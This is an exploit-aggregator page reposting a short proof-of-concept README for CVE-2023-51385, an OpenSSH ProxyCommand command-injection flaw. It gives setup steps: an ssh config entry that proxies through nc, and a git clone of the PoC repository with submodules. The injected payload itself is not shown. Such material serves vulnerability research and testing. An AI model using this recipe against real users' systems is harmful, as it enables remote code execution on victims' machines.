Sploitus

Exploit for CVE-2023-51385_poc-test

kitploit · 2026-08-24

Exploit Code

MARKDOWN21 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-WLAODUO-CVE-2023-51385_POC-TEST
CVE-2023-51385 poc

OpenSSH ProxyCommand RCE poc

OpenSSH <9.6 poc della vulnerabilità di command injection Cinese

![](https://raw.githubusercontent.com/WLaoDuo/CVE-2023-51385_poc-test/main/calc.gif)

![](https://raw.githubusercontent.com/WLaoDuo/CVE-2023-51385_poc-test/main/pop%20firefox.gif)

## 1.`vim ~/.ssh/config` o modifica `C:/Users/username/.ssh/config` su sistema Windows

root@kitploit:~
    
    
    host *.example.com
      ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
    

## 2\. `git clone https://github.com/WLaoDuo/CVE-2023-51385_poc-test --recurse-submodules`